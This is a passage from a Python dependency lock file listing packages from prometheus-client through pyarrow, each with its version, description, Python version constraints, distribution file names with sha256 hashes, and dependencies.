{file = "prometheus_client-0.17.1-py3-none-any.whl", hash = "sha256:e537f37160f6807b8202a6fc4764cdd19bac5480ddd3e0d463c3002b34462101"},
{file = "prometheus_client-0.17.1.tar.gz", hash = "sha256:21e674f39831ae3f8acde238afd9a27a37d0d2fb5a28ea094f0ce25d2cbf2091"},
]
[package.extras]
twisted = ["twisted"]
[[package]]
name = "prompt-toolkit"
version = "3.0.39"
description = "Library for building powerful interactive command lines in Python"
optional = false
python-versions = ">=3.7.0"
files = [
{file = "prompt_toolkit-3.0.39-py3-none-any.whl", hash = "sha256:9dffbe1d8acf91e3de75f3b544e4842382fc06c6babe903ac9acb74dc6e08d88"},
{file = "prompt_toolkit-3.0.39.tar.gz", hash = "sha256:04505ade687dc26dc4284b1ad19a83be2f2afe83e7a828ace0c72f3a1df72aac"},
]
[package.dependencies]
wcwidth = "*"
[[package]]
name = "proto-plus"
version = "1.22.3"
description = "Beautiful, Pythonic protocol buffers."
optional = true
python-versions = ">=3.6"
files = [
{file = "proto-plus-1.22.3.tar.gz", hash = "sha256:fdcd09713cbd42480740d2fe29c990f7fbd885a67efc328aa8be6ee3e9f76a6b"},
{file = "proto_plus-1.22.3-py3-none-any.whl", hash = "sha256:a49cd903bc0b6ab41f76bf65510439d56ca76f868adf0274e738bfdd096894df"},
]
[package.dependencies]
protobuf = ">=3.19.0,<5.0.0dev"
[package.extras]
testing = ["google-api-core[grpc] (>=1.31.5)"]
[[package]]
name = "protobuf"
version = "3.19.6"
description = "Protocol Buffers"
optional = false
python-versions = ">=3.5"
files = [
{file = "protobuf-3.19.6-cp310-cp310-manylinux2014_aarch64.whl", hash = "sha256:010be24d5a44be7b0613750ab40bc8b8cedc796db468eae6c779b395f50d1fa1"},
{file = "protobuf-3.19.6-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:11478547958c2dfea921920617eb457bc26867b0d1aa065ab05f35080c5d9eb6"},
{file = "protobuf-3.19.6-cp310-cp310-win32.whl", hash = "sha256:559670e006e3173308c9254d63facb2c03865818f22204037ab76f7a0ff70b5f"},
{file = "protobuf-3.19.6-cp310-cp310-win_amd64.whl", hash = "sha256:347b393d4dd06fb93a77620781e11c058b3b0a5289262f094379ada2920a3730"},
{file = "protobuf-3.19.6-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:a8ce5ae0de28b51dff886fb922012dad885e66176663950cb2344c0439ecb473"},
{file = "protobuf-3.19.6-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:90b0d02163c4e67279ddb6dc25e063db0130fc299aefabb5d481053509fae5c8"},
{file = "protobuf-3.19.6-cp36-cp36m-win32.whl", hash = "sha256:30f5370d50295b246eaa0296533403961f7e64b03ea12265d6dfce3a391d8992"},
{file = "protobuf-3.19.6-cp36-cp36m-win_amd64.whl", hash = "sha256:0c0714b025ec057b5a7600cb66ce7c693815f897cfda6d6efb58201c472e3437"},
{file = "protobuf-3.19.6-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:5057c64052a1f1dd7d4450e9aac25af6bf36cfbfb3a1cd89d16393a036c49157"},
{file = "protobuf-3.19.6-cp37-cp37m-manylinux2014_aarch64.whl", hash = "sha256:bb6776bd18f01ffe9920e78e03a8676530a5d6c5911934c6a1ac6eb78973ecb6"},
{file = "protobuf-3.19.6-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:84a04134866861b11556a82dd91ea6daf1f4925746b992f277b84013a7cc1229"},
{file = "protobuf-3.19.6-cp37-cp37m-win32.whl", hash = "sha256:4bc98de3cdccfb5cd769620d5785b92c662b6bfad03a202b83799b6ed3fa1fa7"},
{file = "protobuf-3.19.6-cp37-cp37m-win_amd64.whl", hash = "sha256:aa3b82ca1f24ab5326dcf4ea00fcbda703e986b22f3d27541654f749564d778b"},
{file = "protobuf-3.19.6-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:2b2d2913bcda0e0ec9a784d194bc490f5dc3d9d71d322d070b11a0ade32ff6ba"},
{file = "protobuf-3.19.6-cp38-cp38-manylinux2014_aarch64.whl", hash = "sha256:d0b635cefebd7a8a0f92020562dead912f81f401af7e71f16bf9506ff3bdbb38"},
{file = "protobuf-3.19.6-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:7a552af4dc34793803f4e735aabe97ffc45962dfd3a237bdde242bff5a3de684"},
{file = "protobuf-3.19.6-cp38-cp38-win32.whl", hash = "sha256:0469bc66160180165e4e29de7f445e57a34ab68f49357392c5b2f54c656ab25e"},
{file = "protobuf-3.19.6-cp38-cp38-win_amd64.whl", hash = "sha256:91d5f1e139ff92c37e0ff07f391101df77e55ebb97f46bbc1535298d72019462"},
{file = "protobuf-3.19.6-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:c0ccd3f940fe7f3b35a261b1dd1b4fc850c8fde9f74207015431f174be5976b3"},
{file = "protobuf-3.19.6-cp39-cp39-manylinux2014_aarch64.whl", hash = "sha256:30a15015d86b9c3b8d6bf78d5b8c7749f2512c29f168ca259c9d7727604d0e39"},
{file = "protobuf-3.19.6-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:878b4cd080a21ddda6ac6d1e163403ec6eea2e206cf225982ae04567d39be7b0"},
{file = "protobuf-3.19.6-cp39-cp39-win32.whl", hash = "sha256:5a0d7539a1b1fb7e76bf5faa0b44b30f812758e989e59c40f77a7dab320e79b9"},
{file = "protobuf-3.19.6-cp39-cp39-win_amd64.whl", hash = "sha256:bbf5cea5048272e1c60d235c7bd12ce1b14b8a16e76917f371c718bd3005f045"},
{file = "protobuf-3.19.6-py2.py3-none-any.whl", hash = "sha256:14082457dc02be946f60b15aad35e9f5c69e738f80ebbc0900a19bc83734a5a4"},
{file = "protobuf-3.19.6.tar.gz", hash = "sha256:5f5540d57a43042389e87661c6eaa50f47c19c6176e8cf1c4f287aeefeccb5c4"},
]
[[package]]
name = "psutil"
version = "5.9.6"
description = "Cross-platform lib for process and system monitoring in Python."
optional = false
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*, !=3.5.*"
files = [
{file = "psutil-5.9.6-cp27-cp27m-macosx_10_9_x86_64.whl", hash = "sha256:fb8a697f11b0f5994550555fcfe3e69799e5b060c8ecf9e2f75c69302cc35c0d"},
{file = "psutil-5.9.6-cp27-cp27m-manylinux2010_i686.whl", hash = "sha256:91ecd2d9c00db9817a4b4192107cf6954addb5d9d67a969a4f436dbc9200f88c"},
{file = "psutil-5.9.6-cp27-cp27m-manylinux2010_x86_64.whl", hash = "sha256:10e8c17b4f898d64b121149afb136c53ea8b68c7531155147867b7b1ac9e7e28"},
{file = "psutil-5.9.6-cp27-cp27mu-manylinux2010_i686.whl", hash = "sha256:18cd22c5db486f33998f37e2bb054cc62fd06646995285e02a51b1e08da97017"},
{file = "psutil-5.9.6-cp27-cp27mu-manylinux2010_x86_64.whl", hash = "sha256:ca2780f5e038379e520281e4c032dddd086906ddff9ef0d1b9dcf00710e5071c"},
{file = "psutil-5.9.6-cp27-none-win32.whl", hash = "sha256:70cb3beb98bc3fd5ac9ac617a327af7e7f826373ee64c80efd4eb2856e5051e9"},
{file = "psutil-5.9.6-cp27-none-win_amd64.whl", hash = "sha256:51dc3d54607c73148f63732c727856f5febec1c7c336f8f41fcbd6315cce76ac"},
{file = "psutil-5.9.6-cp36-abi3-macosx_10_9_x86_64.whl", hash = "sha256:c69596f9fc2f8acd574a12d5f8b7b1ba3765a641ea5d60fb4736bf3c08a8214a"},
{file = "psutil-5.9.6-cp36-abi3-manylinux_2_12_i686.manylinux2010_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:92e0cc43c524834af53e9d3369245e6cc3b130e78e26100d1f63cdb0abeb3d3c"},
{file = "psutil-5.9.6-cp36-abi3-manylinux_2_12_x86_64.manylinux2010_x86_64.manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:748c9dd2583ed86347ed65d0035f45fa8c851e8d90354c122ab72319b5f366f4"},
{file = "psutil-5.9.6-cp36-cp36m-win32.whl", hash = "sha256:3ebf2158c16cc69db777e3c7decb3c0f43a7af94a60d72e87b2823aebac3d602"},
{file = "psutil-5.9.6-cp36-cp36m-win_amd64.whl", hash = "sha256:ff18b8d1a784b810df0b0fff3bcb50ab941c3b8e2c8de5726f9c71c601c611aa"},
{file = "psutil-5.9.6-cp37-abi3-win32.whl", hash = "sha256:a6f01f03bf1843280f4ad16f4bde26b817847b4c1a0db59bf6419807bc5ce05c"},
{file = "psutil-5.9.6-cp37-abi3-win_amd64.whl", hash = "sha256:6e5fb8dc711a514da83098bc5234264e551ad980cec5f85dabf4d38ed6f15e9a"},
{file = "psutil-5.9.6-cp38-abi3-macosx_11_0_arm64.whl", hash = "sha256:daecbcbd29b289aac14ece28eca6a3e60aa361754cf6da3dfb20d4d32b6c7f57"},
{file = "psutil-5.9.6.tar.gz", hash = "sha256:e4b92ddcd7dd4cdd3f900180ea1e104932c7bce234fb88976e2a3b296441225a"},
]
[package.extras]
test = ["enum34", "ipaddress", "mock", "pywin32", "wmi"]
[[package]]
name = "psychicapi"
version = "0.8.4"
description = "Psychic.dev is an open-source data integration platform for LLMs. This is the Python client for Psychic"
optional = true
python-versions = "*"
files = [
{file = "psychicapi-0.8.4-py3-none-any.whl", hash = "sha256:bf0a0ea858a79c8d443565d0d1ae8d7f8c63095bf4fd2bd7723241e46b59bbd4"},
{file = "psychicapi-0.8.4.tar.gz", hash = "sha256:18dc3f2e4ab4dbbf6002c39f4ce680fbd7b86253d92403a5e6530ddf07064224"},
]
[package.dependencies]
requests = "*"
[[package]]
name = "psycopg2"
version = "2.9.9"
description = "psycopg2 - Python-PostgreSQL Database Adapter"
optional = true
python-versions = ">=3.7"
files = [
{file = "psycopg2-2.9.9-cp310-cp310-win32.whl", hash = "sha256:38a8dcc6856f569068b47de286b472b7c473ac7977243593a288ebce0dc89516"},
{file = "psycopg2-2.9.9-cp310-cp310-win_amd64.whl", hash = "sha256:426f9f29bde126913a20a96ff8ce7d73fd8a216cfb323b1f04da402d452853c3"},
{file = "psycopg2-2.9.9-cp311-cp311-win32.whl", hash = "sha256:ade01303ccf7ae12c356a5e10911c9e1c51136003a9a1d92f7aa9d010fb98372"},
{file = "psycopg2-2.9.9-cp311-cp311-win_amd64.whl", hash = "sha256:121081ea2e76729acfb0673ff33755e8703d45e926e416cb59bae3a86c6a4981"},
{file = "psycopg2-2.9.9-cp37-cp37m-win32.whl", hash = "sha256:5e0d98cade4f0e0304d7d6f25bbfbc5bd186e07b38eac65379309c4ca3193efa"},
{file = "psycopg2-2.9.9-cp37-cp37m-win_amd64.whl", hash = "sha256:7e2dacf8b009a1c1e843b5213a87f7c544b2b042476ed7755be813eaf4e8347a"},
{file = "psycopg2-2.9.9-cp38-cp38-win32.whl", hash = "sha256:ff432630e510709564c01dafdbe996cb552e0b9f3f065eb89bdce5bd31fabf4c"},
{file = "psycopg2-2.9.9-cp38-cp38-win_amd64.whl", hash = "sha256:bac58c024c9922c23550af2a581998624d6e02350f4ae9c5f0bc642c633a2d5e"},
{file = "psycopg2-2.9.9-cp39-cp39-win32.whl", hash = "sha256:c92811b2d4c9b6ea0285942b2e7cac98a59e166d59c588fe5cfe1eda58e72d59"},
{file = "psycopg2-2.9.9-cp39-cp39-win_amd64.whl", hash = "sha256:de80739447af31525feddeb8effd640782cf5998e1a4e9192ebdf829717e3913"},
{file = "psycopg2-2.9.9.tar.gz", hash = "sha256:d1454bde93fb1e224166811694d600e746430c006fbb031ea06ecc2ea41bf156"},
]
[[package]]
name = "psycopg2-binary"
version = "2.9.9"
description = "psycopg2 - Python-PostgreSQL Database Adapter"
optional = true
python-versions = ">=3.7"
files = [
{file = "psycopg2-binary-2.9.9.tar.gz", hash = "sha256:7f01846810177d829c7692f1f5ada8096762d9172af1b1a28d4ab5b77c923c1c"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:c2470da5418b76232f02a2fcd2229537bb2d5a7096674ce61859c3229f2eb202"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:c6af2a6d4b7ee9615cbb162b0738f6e1fd1f5c3eda7e5da17861eacf4c717ea7"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:75723c3c0fbbf34350b46a3199eb50638ab22a0228f93fb472ef4d9becc2382b"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:83791a65b51ad6ee6cf0845634859d69a038ea9b03d7b26e703f94c7e93dbcf9"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:0ef4854e82c09e84cc63084a9e4ccd6d9b154f1dbdd283efb92ecd0b5e2b8c84"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ed1184ab8f113e8d660ce49a56390ca181f2981066acc27cf637d5c1e10ce46e"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:d2997c458c690ec2bc6b0b7ecbafd02b029b7b4283078d3b32a852a7ce3ddd98"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:b58b4710c7f4161b5e9dcbe73bb7c62d65670a87df7bcce9e1faaad43e715245"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_ppc64le.whl", hash = "sha256:0c009475ee389757e6e34611d75f6e4f05f0cf5ebb76c6037508318e1a1e0d7e"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:8dbf6d1bc73f1d04ec1734bae3b4fb0ee3cb2a493d35ede9badbeb901fb40f6f"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-win32.whl", hash = "sha256:3f78fd71c4f43a13d342be74ebbc0666fe1f555b8837eb113cb7416856c79682"},
{file = "psycopg2_binary-2.9.9-cp310-cp310-win_amd64.whl", hash = "sha256:876801744b0dee379e4e3c38b76fc89f88834bb15bf92ee07d94acd06ec890a0"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:ee825e70b1a209475622f7f7b776785bd68f34af6e7a46e2e42f27b659b5bc26"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:1ea665f8ce695bcc37a90ee52de7a7980be5161375d42a0b6c6abedbf0d81f0f"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:143072318f793f53819048fdfe30c321890af0c3ec7cb1dfc9cc87aa88241de2"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:c332c8d69fb64979ebf76613c66b985414927a40f8defa16cf1bc028b7b0a7b0"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:f7fc5a5acafb7d6ccca13bfa8c90f8c51f13d8fb87d95656d3950f0158d3ce53"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:977646e05232579d2e7b9c59e21dbe5261f403a88417f6a6512e70d3f8a046be"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:b6356793b84728d9d50ead16ab43c187673831e9d4019013f1402c41b1db9b27"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:bc7bb56d04601d443f24094e9e31ae6deec9ccb23581f75343feebaf30423359"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_ppc64le.whl", hash = "sha256:77853062a2c45be16fd6b8d6de2a99278ee1d985a7bd8b103e97e41c034006d2"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:78151aa3ec21dccd5cdef6c74c3e73386dcdfaf19bced944169697d7ac7482fc"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-win32.whl", hash = "sha256:dc4926288b2a3e9fd7b50dc6a1909a13bbdadfc67d93f3374d984e56f885579d"},
{file = "psycopg2_binary-2.9.9-cp311-cp311-win_amd64.whl", hash = "sha256:b76bedd166805480ab069612119ea636f5ab8f8771e640ae103e05a4aae3e417"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:8532fd6e6e2dc57bcb3bc90b079c60de896d2128c5d9d6f24a63875a95a088cf"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8f8544b092a29a6ddd72f3556a9fcf249ec412e10ad28be6a0c0d948924f2212"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:2d423c8d8a3c82d08fe8af900ad5b613ce3632a1249fd6a223941d0735fce493"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:2e5afae772c00980525f6d6ecf7cbca55676296b580c0e6abb407f15f3706996"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:6e6f98446430fdf41bd36d4faa6cb409f5140c1c2cf58ce0bbdaf16af7d3f119"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:c77e3d1862452565875eb31bdb45ac62502feabbd53429fdc39a1cc341d681ba"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:cb16c65dcb648d0a43a2521f2f0a2300f40639f6f8c1ecbc662141e4e3e1ee07"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_ppc64le.whl", hash = "sha256:911dda9c487075abd54e644ccdf5e5c16773470a6a5d3826fda76699410066fb"},
{file = "psycopg2_binary-2.9.9-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:57fede879f08d23c85140a360c6a77709113efd1c993923c59fde17aa27599fe"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:2293b001e319ab0d869d660a704942c9e2cce19745262a8aba2115ef41a0a42a"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:03ef7df18daf2c4c07e2695e8cfd5ee7f748a1d54d802330985a78d2a5a6dca9"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:0a602ea5aff39bb9fac6308e9c9d82b9a35c2bf288e184a816002c9fae930b77"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:8359bf4791968c5a78c56103702000105501adb557f3cf772b2c207284273984"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:275ff571376626195ab95a746e6a04c7df8ea34638b99fc11160de91f2fef503"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:f9b5571d33660d5009a8b3c25dc1db560206e2d2f89d3df1cb32d72c0d117d52"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:420f9bbf47a02616e8554e825208cb947969451978dceb77f95ad09c37791dae"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_ppc64le.whl", hash = "sha256:4154ad09dac630a0f13f37b583eae260c6aa885d67dfbccb5b02c33f31a6d420"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:a148c5d507bb9b4f2030a2025c545fccb0e1ef317393eaba42e7eabd28eb6041"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-win32.whl", hash = "sha256:68fc1f1ba168724771e38bee37d940d2865cb0f562380a1fb1ffb428b75cb692"},
{file = "psycopg2_binary-2.9.9-cp37-cp37m-win_amd64.whl", hash = "sha256:281309265596e388ef483250db3640e5f414168c5a67e9c665cafce9492eda2f"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:60989127da422b74a04345096c10d416c2b41bd7bf2a380eb541059e4e999980"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:246b123cc54bb5361588acc54218c8c9fb73068bf227a4a531d8ed56fa3ca7d6"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:34eccd14566f8fe14b2b95bb13b11572f7c7d5c36da61caf414d23b91fcc5d94"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:18d0ef97766055fec15b5de2c06dd8e7654705ce3e5e5eed3b6651a1d2a9a152"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:d3f82c171b4ccd83bbaf35aa05e44e690113bd4f3b7b6cc54d2219b132f3ae55"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ead20f7913a9c1e894aebe47cccf9dc834e1618b7aa96155d2091a626e59c972"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:ca49a8119c6cbd77375ae303b0cfd8c11f011abbbd64601167ecca18a87e7cdd"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:323ba25b92454adb36fa425dc5cf6f8f19f78948cbad2e7bc6cdf7b0d7982e59"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_ppc64le.whl", hash = "sha256:1236ed0952fbd919c100bc839eaa4a39ebc397ed1c08a97fc45fee2a595aa1b3"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:729177eaf0aefca0994ce4cffe96ad3c75e377c7b6f4efa59ebf003b6d398716"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-win32.whl", hash = "sha256:804d99b24ad523a1fe18cc707bf741670332f7c7412e9d49cb5eab67e886b9b5"},
{file = "psycopg2_binary-2.9.9-cp38-cp38-win_amd64.whl", hash = "sha256:a6cdcc3ede532f4a4b96000b6362099591ab4a3e913d70bcbac2b56c872446f7"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:72dffbd8b4194858d0941062a9766f8297e8868e1dd07a7b36212aaa90f49472"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:30dcc86377618a4c8f3b72418df92e77be4254d8f89f14b8e8f57d6d43603c0f"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:31a34c508c003a4347d389a9e6fcc2307cc2150eb516462a7a17512130de109e"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:15208be1c50b99203fe88d15695f22a5bed95ab3f84354c494bcb1d08557df67"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_ppc64le.manylinux2014_ppc64le.whl", hash = "sha256:1873aade94b74715be2246321c8650cabf5a0d098a95bab81145ffffa4c13876"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:3a58c98a7e9c021f357348867f537017057c2ed7f77337fd914d0bedb35dace7"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:4686818798f9194d03c9129a4d9a702d9e113a89cb03bffe08c6cf799e053291"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:ebdc36bea43063116f0486869652cb2ed7032dbc59fbcb4445c4862b5c1ecf7f"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_ppc64le.whl", hash = "sha256:ca08decd2697fdea0aea364b370b1249d47336aec935f87b8bbfd7da5b2ee9c1"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:ac05fb791acf5e1a3e39402641827780fe44d27e72567a000412c648a85ba860"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-win32.whl", hash = "sha256:9dba73be7305b399924709b91682299794887cbbd88e38226ed9f6712eabee90"},
{file = "psycopg2_binary-2.9.9-cp39-cp39-win_amd64.whl", hash = "sha256:f7ae5d65ccfbebdfa761585228eb4d0df3a8b15cfb53bd953e713e09fbb12957"},
]
[[package]]
name = "ptyprocess"
version = "0.7.0"
description = "Run a subprocess in a pseudo terminal"
optional = false
python-versions = "*"
files = [
{file = "ptyprocess-0.7.0-py2.py3-none-any.whl", hash = "sha256:4b41f3967fce3af57cc7e94b888626c18bf37a083e3651ca8feeb66d492fef35"},
{file = "ptyprocess-0.7.0.tar.gz", hash = "sha256:5c5d0a3b48ceee0b48485e0c26037c0acd7d29765ca3fbb5cb3831d347423220"},
]
[[package]]
name = "pure-eval"
version = "0.2.2"
description = "Safely evaluate AST nodes without side effects"
optional = false
python-versions = "*"
files = [
{file = "pure_eval-0.2.2-py3-none-any.whl", hash = "sha256:01eaab343580944bc56080ebe0a674b39ec44a945e6d09ba7db3cb8cec289350"},
{file = "pure_eval-0.2.2.tar.gz", hash = "sha256:2b45320af6dfaa1750f543d714b6d1c520a1688dec6fd24d339063ce0aaa9ac3"},
]
[package.extras]
tests = ["pytest"]
[[package]]
name = "py"
version = "1.11.0"
description = "library with cross-python path, ini-parsing, io, code, log facilities"
optional = true
python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*"
files = [
{file = "py-1.11.0-py2.py3-none-any.whl", hash = "sha256:607c53218732647dff4acdfcd50cb62615cedf612e72d1724fb1a0cc6405b378"},
{file = "py-1.11.0.tar.gz", hash = "sha256:51c75c4126074b472f746a24399ad32f6053d1b34b68d2fa41e558e6f4a98719"},
]
[[package]]
name = "py-trello"
version = "0.19.0"
description = "Python wrapper around the Trello API"
optional = true
python-versions = "*"
files = [
{file = "py-trello-0.19.0.tar.gz", hash = "sha256:f4a8c05db61fad0ef5fa35d62c29806c75d9d2b797358d9cf77275e2cbf23020"},
]
[package.dependencies]
python-dateutil = "*"
pytz = "*"
requests = "*"
requests-oauthlib = ">=0.4.1"
[[package]]
name = "py4j"
version = "0.10.9.7"
description = "Enables Python programs to dynamically access arbitrary Java objects"
optional = true
python-versions = "*"
files = [
{file = "py4j-0.10.9.7-py2.py3-none-any.whl", hash = "sha256:85defdfd2b2376eb3abf5ca6474b51ab7e0de341c75a02f46dc9b5976f5a5c1b"},
{file = "py4j-0.10.9.7.tar.gz", hash = "sha256:0b6e5315bb3ada5cf62ac651d107bb2ebc02def3dee9d9548e3baac644ea8dbb"},
]
[[package]]
name = "pyaes"
version = "1.6.1"
description = "Pure-Python Implementation of the AES block-cipher and common modes of operation"
optional = true
python-versions = "*"
files = [
{file = "pyaes-1.6.1.tar.gz", hash = "sha256:02c1b1405c38d3c370b085fb952dd8bea3fadcee6411ad99f312cc129c536d8f"},
]
[[package]]
name = "pyarrow"
version = "13.0.0"
description = "Python library for Apache Arrow"
optional = true
python-versions = ">=3.8"
files = [
{file = "pyarrow-13.0.0-cp310-cp310-macosx_10_14_x86_64.whl", hash = "sha256:1afcc2c33f31f6fb25c92d50a86b7a9f076d38acbcb6f9e74349636109550148"},
{file = "pyarrow-13.0.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:70fa38cdc66b2fc1349a082987f2b499d51d072faaa6b600f71931150de2e0e3"},
{file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:cd57b13a6466822498238877892a9b287b0a58c2e81e4bdb0b596dbb151cbb73"},
{file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f8ce69f7bf01de2e2764e14df45b8404fc6f1a5ed9871e8e08a12169f87b7a26"},
{file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_28_aarch64.whl", hash = "sha256:588f0d2da6cf1b1680974d63be09a6530fd1bd825dc87f76e162404779a157dc"},
{file = "pyarrow-13.0.0-cp310-cp310-manylinux_2_28_x86_64.whl", hash = "sha256:6241afd72b628787b4abea39e238e3ff9f34165273fad306c7acf780dd850956"},
{file = "pyarrow-13.0.0-cp310-cp310-win_amd64.whl", hash = "sha256:fda7857e35993673fcda603c07d43889fca60a5b254052a462653f8656c64f44"},
{file = "pyarrow-13.0.0-cp311-cp311-macosx_10_14_x86_64.whl", hash = "sha256:aac0ae0146a9bfa5e12d87dda89d9ef7c57a96210b899459fc2f785303dcbb67"},
